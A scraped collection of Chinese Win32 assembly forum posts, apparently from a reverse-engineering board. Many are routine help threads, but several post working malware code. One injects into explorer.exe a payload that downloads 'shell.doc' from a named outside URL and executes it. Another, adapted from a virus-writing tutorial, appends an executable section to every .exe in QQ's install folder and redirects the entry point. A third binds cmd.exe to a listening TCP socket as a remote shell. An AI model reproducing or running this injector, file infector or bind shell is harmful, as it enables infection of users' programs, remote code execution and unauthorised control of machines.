|
[求助]如何获得DLL的未公开函数的参数
代码捏? IDA可以自动识别函数的参数,比如类似: sub_0c = dword ptr 8h sub_1c = dword ptr 04h 这样就表示这个函数有两个参数。windows API按照一定的调用规范,参数是从右到左压栈的,所以栈上偏移较小的是靠左的参数,这个函数的原型一般是: 函数名(char *sub_1c ,char *sub_0c) |
|
WIN 32 汇编编译问题
用Aogo写的MASMPlus就可以编译... |
|
|
|
[求助]注入目标进程并调用其中的函数
.386 .model flat, stdcall option casemap:none include windows.inc include kernel32.inc include user32.inc include urlmon.inc include shell32.inc includelib kernel32.lib includelib user32.lib includelib urlmon.lib includelib shell32.lib .data szDesktopClass db 'Progman',0 ;explorer.exe 的窗口类 szDesktopWindow db 'Program Manager',0 szURL db 'Http://chenmingzhong87.xinwen365.com/shell.doc',0 szSaveFile db 'C:\shell.doc',0 .data? hModule dd ? hWnd dd ? hProcess dd ? ShellSize dd ? Pid dd ? Written dd ? dwTid dd ? .code Shellcode proc push 00403008H call LoadLibrary push 00403013H call LoadLibrary invoke URLDownloadToFile,NULL,addr szURL,addr szSaveFile,NULL,NULL invoke ShellExecute,0,0,addr szSaveFile,0,0,SW_SHOW invoke ExitThread,0 ret Shellcode endp start: invoke GetModuleHandle, 0 mov hModule, eax mov edi, eax assume edi:ptr IMAGE_DOS_HEADER add edi, [edi].e_lfanew add edi, sizeof dword add edi, sizeof IMAGE_FILE_HEADER assume edi:ptr IMAGE_OPTIONAL_HEADER32 mov eax, [edi].SizeOfImage mov ShellSize, eax assume edi:NOTHING invoke FindWindow,addr szDesktopClass,addr szDesktopWindow invoke GetWindowThreadProcessId, eax, addr Pid invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_WRITE+\ PROCESS_VM_OPERATION,FALSE,Pid mov hProcess, eax invoke VirtualFreeEx, hProcess, hModule, 0, MEM_RELEASE invoke VirtualAllocEx, hProcess, hModule, ShellSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE mov hWnd, eax invoke WriteProcessMemory, hProcess, hWnd, hModule, ShellSize, addr Written invoke CreateRemoteThread, hProcess, 0, 0, addr Shellcode, hModule, 0, addr dwTid invoke ExitProcess, 0 end start |
|
[讨论]如何获取文件时间(本地)
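.386
.model flat,stdcall
option casemap:none
include windows.inc
include gdi32.inc
includelib gdi32.lib
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib

.data?
szBuffer        db 256 dup(?)       ; output buffer for wsprintf
lpCreationTime  FILETIME <?>        ; creation time as returned by GetFileTime (UTC)
lpLocalTime     FILETIME <?>        ; the same instant converted to the local time zone

.const
szFileName  db 'c:\123.txt',0
szCaption   db 'AutoBack',0
szText      db '读取文件失败!',0
szDataF     db '文件创建的时间是:%d年%d月%d日',0

.code
; _WinMain: open szFileName read-only, fetch its creation time and show it
; as a local-time year/month/day in a message box.
; Every path ends in ExitProcess, so control never returns from here and
; runs off the end of the program (the original fell through to `start`
; when FileTimeToSystemTime failed).
_WinMain proc
    local @hFile:DWORD
    local @stLocal:SYSTEMTIME

    invoke CreateFile,addr szFileName,\
        GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
    .if eax == INVALID_HANDLE_VALUE
        invoke MessageBox,NULL,offset szText,offset szCaption,MB_OK
        invoke ExitProcess,NULL
    .endif
    mov @hFile,eax

    ; The handle is only needed for GetFileTime; close it immediately
    ; (the original never released it).  GetFileTime's result is kept
    ; across the CloseHandle call so a failure can still be reported.
    invoke GetFileTime,@hFile,addr lpCreationTime,NULL,NULL
    push eax
    invoke CloseHandle,@hFile
    pop eax
    .if eax != NULL
        ; GetFileTime reports UTC; the thread asks for *local* time, so
        ; convert with FileTimeToLocalFileTime before splitting the value
        ; into a SYSTEMTIME.
        invoke FileTimeToLocalFileTime,addr lpCreationTime,addr lpLocalTime
        .if eax != NULL
            invoke FileTimeToSystemTime,addr lpLocalTime,addr @stLocal
            .if eax != NULL
                movzx eax,@stLocal.wYear    ; WORD fields -> 32-bit for wsprintf's %d
                movzx edx,@stLocal.wMonth
                movzx ecx,@stLocal.wDay
                invoke wsprintf,addr szBuffer,addr szDataF,eax,edx,ecx
                invoke MessageBox,NULL,addr szBuffer,offset szCaption,MB_OK
                invoke ExitProcess,NULL
            .endif
        .endif
    .endif
    ; Reading or converting the time failed: tell the user and exit cleanly.
    invoke MessageBox,NULL,offset szText,offset szCaption,MB_OK
    invoke ExitProcess,NULL
_WinMain endp

start:
    call _WinMain
end start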
|
[讨论]学习Billy Belceb病毒编写教程后改写成masm格式
修改了一下老罗的代码: .386 .model flat, stdcall option casemap:none include windows.inc include kernel32.inc include user32.inc includelib kernel32.lib includelib user32.lib include advapi32.inc includelib advapi32.lib WndProc proto :DWORD, :DWORD, :DWORD, :DWORD AddNewSection proto :DWORD ;很有用的宏: CTEXT MACRO y:VARARG LOCAL sym CONST segment ifidni <y>,<> sym db 0 else sym db y,0 endif CONST ends exitm <offset sym> ENDM .const MAXSIZE equ 260 Head_Len equ sizeof IMAGE_NT_HEADERS + sizeof IMAGE_SECTION_HEADER .data szRegKey db 'SOFTWARE/TENCENT/QQ',0 szKey db 'Install',0 ;键值名称 szStr1 dd REG_SZ ;数据 FileNamePattern db "*.exe",0 ofn OPENFILENAME <> FileNameOfQQ db 256 dup(0) PE_Header IMAGE_NT_HEADERS <0> My_Section IMAGE_SECTION_HEADER <> szDllName db "User32", 0 szMessageBoxA db "MessageBoxA", 0 FileName db 256 dup(0) szFile db 256 dup(0) .code ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FillFileInfo proc uses edi LOCAL finddata:WIN32_FIND_DATA LOCAL hFindFile:DWORD invoke FindFirstFile,addr szFile,addr finddata .if eax!=INVALID_HANDLE_VALUE mov hFindFile,eax .repeat invoke RtlZeroMemory,addr FileNameOfQQ,sizeof FileNameOfQQ invoke lstrcat,addr FileNameOfQQ,addr FileName lea eax,finddata.cFileName invoke lstrcat,addr FileNameOfQQ,eax call _AddNewSection invoke FindNextFile,hFindFile,addr finddata .until eax == FALSE invoke FindClose,hFindFile .endif ret FillFileInfo endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _QueryKey proc _lpKey LOCAL hKey :DWORD LOCAL BufSize :DWORD invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr szRegKey,NULL, KEY_QUERY_VALUE,addr hKey .if eax == ERROR_SUCCESS invoke RegQueryValueEx,hKey,addr szKey,NULL,NULL,addr FileName,addr BufSize .if eax == ERROR_SUCCESS invoke lstrcat,addr szFile,addr FileName invoke lstrcat,addr szFile,addr FileNamePattern invoke RegCloseKey,hKey .endif .endif ret _QueryKey endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> main: call _QueryKey call FillFileInfo invoke ExitProcess,NULL _AddNewSection 
proc LOCAL hFile: HANDLE LOCAL dwPE_Header_OffSet: DWORD LOCAL dwFileReadWritten: DWORD LOCAL dwMySectionOffSet: DWORD LOCAL dwLastSection_SizeOfRawData: DWORD LOCAL dwLastSection_PointerToRawData: DWORD ;打开文件: invoke CreateFile, addr FileNameOfQQ, GENERIC_READ or GENERIC_WRITE,/ FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL .if eax != INVALID_HANDLE_VALUE mov hFile, eax ;**************************************** ;读取PE文件头: ;**************************************** invoke SetFilePointer, hFile, 3ch, 0, FILE_BEGIN invoke ReadFile, hFile, addr dwPE_Header_OffSet, 4, addr dwFileReadWritten, NULL invoke SetFilePointer, hFile, dwPE_Header_OffSet, 0, FILE_BEGIN invoke ReadFile, hFile, addr PE_Header, Head_Len, addr dwFileReadWritten, NULL ;**************************************** ;判断是否有效的PE文件,是的话才继续: ;**************************************** .if [PE_Header.Signature] != IMAGE_NT_SIGNATURE ;如果不是有效的PE文件,就给出提示: invoke CloseHandle,hFile .endif ;**************************************** ;判断是否有足够空间存储新节: ;**************************************** movzx eax, [PE_Header.FileHeader.NumberOfSections] ;得到添加新节前有多少个节: mov ecx, 28h ;28h = sizeof IMAGE_SECTION_HEADER mul ecx ;eax = NumberOfSections * sizeof IMAGE_SECTION_HEADER add eax, dwPE_Header_OffSet ;eax = eax + PE文件头偏移 add eax, 18h ;18h = sizeof IMAGE_FILE_HEADER movzx ecx, [PE_Header.FileHeader.SizeOfOptionalHeader] add eax, ecx ;eax = eax + sizeof IMAGE_OPTIONAL_HEADER add eax, 28h ;添加一个新节的大小 .if eax > [PE_Header.OptionalHeader.SizeOfHeaders] invoke CloseHandle,hFile .endif ;**************************************** ;保存原入口,后面要用到: ;**************************************** mov eax, [PE_Header.OptionalHeader.AddressOfEntryPoint] mov Old_AddressOfEntryPoint, eax mov eax, [PE_Header.OptionalHeader.ImageBase] mov Old_ImageBase, eax ;************************************************** ;计算新节的偏移地址: ;(其实跟上面的“判断是否有足够空间存储新节”基本上一样) ;************************************************** movzx eax, 
[PE_Header.FileHeader.NumberOfSections] mov ecx, 28h mul ecx ;eax = NumberOfSections * sizeof IMAGE_SECTION_HEADER add eax, 4h ;4h = sizeof "PE/0/0" add eax, dwPE_Header_OffSet add eax, sizeof IMAGE_FILE_HEADER add eax, sizeof IMAGE_OPTIONAL_HEADER mov dwMySectionOffSet, eax ;现在得到了我们的新节的偏移地址 ;**************************************** ;填充我们自己的节的信息: ;(这部分请查看PE格式,很容易明白,不多说了) ;**************************************** mov dword ptr [My_Section.Name1], "MSA." ;名字就叫做“.ASM”吧,呵呵…… mov [My_Section.Misc.VirtualSize], offset vEnd - offset vStart push [PE_Header.OptionalHeader.SizeOfImage] pop [My_Section.VirtualAddress] mov eax, [My_Section.Misc.VirtualSize] mov ecx, [PE_Header.OptionalHeader.FileAlignment] cdq div ecx inc eax mul ecx mov [My_Section.SizeOfRawData], eax ;SizeOfRawData在EXE文件中是对齐到FileAlignMent的整数倍的值 mov eax, dwMySectionOffSet sub eax, 18h ;这个偏移是定位到最后一节的“SizeOfRawData” invoke SetFilePointer, hFile, eax, 0, FILE_BEGIN invoke ReadFile, hFile, addr dwLastSection_SizeOfRawData, 4, addr dwFileReadWritten, NULL invoke ReadFile, hFile, addr dwLastSection_PointerToRawData, 4, addr dwFileReadWritten, NULL ;每个节的 PointerToRawData 等于它的上一节的 SizeOfRawData + PointerToRawData: mov eax, dwLastSection_SizeOfRawData add eax, dwLastSection_PointerToRawData mov [My_Section.PointerToRawData], eax mov [My_Section.PointerToRelocations], 0h mov [My_Section.PointerToLinenumbers], 0h mov [My_Section.NumberOfRelocations], 0h mov [My_Section.NumberOfLinenumbers], 0h mov [My_Section.Characteristics],0E0000020h ;可读可写可执行 ;************************************************** ;重新写入IMAGE_SECTION_HEADER:(包含了新节的信息) ;************************************************** invoke SetFilePointer, hFile, dwMySectionOffSet, 0, FILE_BEGIN invoke WriteFile, hFile, addr My_Section, sizeof IMAGE_SECTION_HEADER, addr dwFileReadWritten, NULL ;**************************************** ;得到 MessageBoxA 的线性地址: ;**************************************** invoke GetModuleHandle, addr szDllName invoke LoadLibrary, addr 
szDllName invoke GetProcAddress, eax, addr szMessageBoxA mov MessageBoxA_Addr, eax ;**************************************** ;在文件的最后写入我们的新节: ;**************************************** invoke SetFilePointer, hFile, 0, 0, FILE_END push 0 lea eax, dwFileReadWritten push eax push [My_Section.SizeOfRawData] lea eax, vStart push eax push hFile call WriteFile ;************************************************** ;改写IMAGE_NT_HEADERS,使新节可以首先执行: ;(需要改写 SizeOfImage 和 AddressOfEntryPoint) ;************************************************** inc [PE_Header.FileHeader.NumberOfSections] mov eax, [My_Section.Misc.VirtualSize] mov ecx, [PE_Header.OptionalHeader.SectionAlignment] cdq div ecx inc eax mul ecx add eax, [PE_Header.OptionalHeader.SizeOfImage] mov [PE_Header.OptionalHeader.SizeOfImage], eax ;SizeOfImage是一个对齐到SectionAlignment的整数倍的值 mov eax, [My_Section.VirtualAddress] mov [PE_Header.OptionalHeader.AddressOfEntryPoint], eax ;现在的 AddressOfEntryPoint 是指向新节的第一条指令 invoke SetFilePointer, hFile, dwPE_Header_OffSet, 0, FILE_BEGIN invoke WriteFile, hFile, addr PE_Header, sizeof IMAGE_NT_HEADERS, addr dwFileReadWritten, NULL ;**************************************** ;完成!显示成功信息: ;**************************************** invoke CloseHandle,hFile .endif Err_CreateFile_Exit: ret _AddNewSection endp ;**************************************** ;呵呵,我们自己的东东:(像不像病毒?) ;**************************************** vStart: call nStart nStart: pop ebp sub ebp, offset nStart ;得到新节在文件中的实际偏移地址 ;显示对话框: push MB_OK or MB_ICONINFORMATION lea eax, szMyCaption[ebp] push eax lea eax, szMyMsg[ebp] push eax push 0 call MessageBoxA_Addr[ebp] ;恢复原入口地址。当这个节执行完毕后,就回到了原来的文件入口处继续执行: mov eax, Old_ImageBase[ebp] add eax, Old_AddressOfEntryPoint[ebp] push eax ret ;变量定义: MessageBoxA_Addr dd 0 szMyMsg db "看贴不回帖的人木JJ ^_^", 13, 10, 13, 10,/ "by asm",13, 10, "http://www.wolfexp.net",0 szMyCaption db "谁木JJ", 0 Old_ImageBase dd 0 Old_AddressOfEntryPoint dd 0 vEnd: end main |
|
最近学习32位汇编的问题,在线等高手解答。
; Fragment only: szExplorer and stProcess are defined elsewhere
; (stProcess.szExeFile is presumably a PROCESSENTRY32 from a Toolhelp
; snapshot - not shown in this snippet).
; NORM_IGNORECASE makes the comparison case-insensitive (忽略大小写);
; -1 for both lengths tells CompareString the strings are NUL-terminated.
invoke CompareString,LOCALE_USER_DEFAULT,NORM_IGNORECASE,addr szExplorer,-1,addr stProcess.szExeFile,-1
; CompareString does not return TRUE/FALSE: it returns CSTR_EQUAL (= 2)
; when the strings match, CSTR_LESS_THAN/CSTR_GREATER_THAN otherwise and
; 0 on error - hence the test against 2.
.if eax==2
|
[求助]关于移动文件指针
搞定,谢谢了. |
|
[求助]刚刚学了WIN32汇编,现在想写一个QQ的自动登录程序
可以抓个包查看QQ的登陆方式,然后用网络编程函数来实现... |
|
请教这段插入进程的代码ASM
又见到楼主? 其实这样的方式是很复杂,不比下面的好: link:/base:0x13140000 /filealign:0x200 /merge:.data=.text /section:.text,RWX /subsystem:windows /libpath:\masm32\lib .386 .model flat, stdcall option casemap:none include windows.inc include kernel32.inc include user32.inc includelib kernel32.lib includelib user32.lib .data szDesktopClass db 'Progman',0 ;explorer.exe 的窗口类 szDesktopWindow db 'Program Manager',0 szUser32 db 'user32.dll',0 szTitle db "Hello", 0 szText db "Hello, World", 0 .data? hModule dd ? hWnd dd ? hProcess dd ? ShellSize dd ? Pid dd ? Written dd ? dwTid dd ? .code Shellcode proc invoke LoadLibrary,addr szUser32 invoke MessageBox, NULL, addr szText, addr szTitle, MB_OK or MB_ICONINFORMATION invoke ExitThread,0 ret Shellcode endp start: ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> invoke GetModuleHandle, 0 ;获取自身模块 mov hModule, eax ;保存句柄 mov edi, eax assume edi:ptr IMAGE_DOS_HEADER ;对应这个结构 add edi, [edi].e_lfanew ;恢复PE头 add edi, sizeof dword add edi, sizeof IMAGE_FILE_HEADER assume edi:ptr IMAGE_OPTIONAL_HEADER32 ;对应这个结构 mov eax, [edi].SizeOfImage ;恢复内存影象尺寸 mov ShellSize, eax ;保存其长度字节,等待写入 assume edi:NOTHING ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> invoke FindWindow,addr szDesktopClass,addr szDesktopWindow invoke GetWindowThreadProcessId, eax, addr Pid invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_WRITE+\ PROCESS_VM_OPERATION,FALSE,Pid mov hProcess, eax invoke VirtualFreeEx, hProcess, hModule, 0, MEM_RELEASE invoke VirtualAllocEx, hProcess, hModule, ShellSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE mov hWnd, eax invoke WriteProcessMemory, hProcess, hWnd, hModule, ShellSize, addr Written invoke CreateRemoteThread, hProcess, 0, 0, addr Shellcode, hModule, 0, addr dwTid invoke ExitProcess, 0 end start |
|
|
|
[加一篇外传!][添加工具下载!]Windows 核心编程研究系列之二:读取指定物理内存地址中的内容
"很多用No_Share打开的文件,正常情况下不能在其他进程用 CreateFile打开,或者是仅仅用FILE_SHARE_READ打开的 文件不能再以写入目而打开,那么如何绕过windows的这种保护呢?敬请期待。?" 无限期待 这样的突破方式,貌似也可以用在以FILE_MAP_READ的方式MapViewOfFile一个文件,但是却绕过windows对文件共享内存进行写的访问 |
|
[讨论]win32汇编如何实现cmd的输出转向
我就是红狼的asm,经常混邪恶八进制,winker是我在看雪的马甲 这个问题已经解决了: http://forum.eviloctal.com/read-htm-tid-26719.html 原来只是CreateProcess的一个参数问题 |
|
[讨论]win32汇编如何实现cmd的输出转向
谁来回答一下,我OD都看眼花了,源代码: .386P .model flat,stdcall option casemap:none include windows.inc include user32.inc include kernel32.inc include wsock32.inc include Ws2_32.inc includelib user32.lib includelib kernel32.lib includelib wsock32.lib includelib Ws2_32.lib TCP_PORT equ 1024 ;常量定义 .data szCommand db 'cmd.exe',0 .data? hScoket SOCKET ? hScoketOther SOCKET ? szBuffer db MAX_PATH dup(?) dwSize DWORD ? .code _ProcessMain proc local @wsaData:WSADATA local @hScoket:SOCKET local @stAddr:sockaddr_in local stStartUp:STARTUPINFO local stProcInfo:PROCESS_INFORMATION invoke WSAStartup,0202H,addr @wsaData ;初始化WSAStartup库 mov @stAddr.sin_family,AF_INET ;设置IP格式 invoke htons,TCP_PORT ;设置端口 mov @stAddr.sin_port,ax ;保存 mov @stAddr.sin_addr,INADDR_ANY ;设置IP地址 invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 ;加载套接字 mov hScoket,eax ;保存句柄 invoke bind,hScoket,addr @stAddr,sizeof sockaddr_in ;绑定 .if eax == SOCKET_ERROR mov eax,FALSE ret .endif invoke listen,hScoket,5 ;开始监听,默认连接5个 invoke accept,hScoket,NULL,NULL ;如果有客户端连接,马上确定 .if eax == INVALID_SOCKET mov eax,FALSE ret .endif mov hScoketOther,eax invoke GetStartupInfo,addr stStartUp mov ebx,hScoketOther mov stStartUp.hStdInput,ebx ;为STARTUPINFO的结构成员赋值,这个值是accept()返回的句柄 mov stStartUp.hStdOutput,ebx mov stStartUp.hStdError,ebx mov stStartUp.dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES mov stStartUp.wShowWindow,SW_HIDE mov stStartUp.wShowWindow,SW_SHOWNORMAL invoke CreateProcess,NULL,addr szCommand,NULL,NULL,\ NULL,NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo ;将结果载入并执行cmd ret _ProcessMain endp start: invoke _ProcessMain invoke ExitProcess,NULL end start |
|
[求助]关于插入进程中编译错误提示
我好好看一下这个宏 |
|
怎么用汇编调用CreateProcessA函数?
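.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib

.data
; Full path for lpApplicationName, so no executable search-path lookup
; is performed.  szCmdLine lives in the writable .data segment (not
; .const) because CreateProcess may modify the command-line buffer.
szFileName  db 'C:\windows\system32\ping.exe',0
szCmdLine   db 'ping www.163.com',0

.data?
stStartUp   STARTUPINFO <?>
stProcInfo  PROCESS_INFORMATION <?>

.code
; Launch ping.exe with the given command line, then exit.
; GetStartupInfo fills stStartUp (including cb) from this process's own
; startup information, which is sufficient for a plain CreateProcess call.
start:
    invoke GetStartupInfo,addr stStartUp
    invoke CreateProcess,addr szFileName,addr szCmdLine,NULL,NULL,NULL,\
        NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo
    ; CreateProcess returns non-zero on success.  The two handles it
    ; hands back are ours to release; the original leaked both.
    .if eax != 0
        invoke CloseHandle,stProcInfo.hThread
        invoke CloseHandle,stProcInfo.hProcess
    .endif
    invoke ExitProcess,NULL
end start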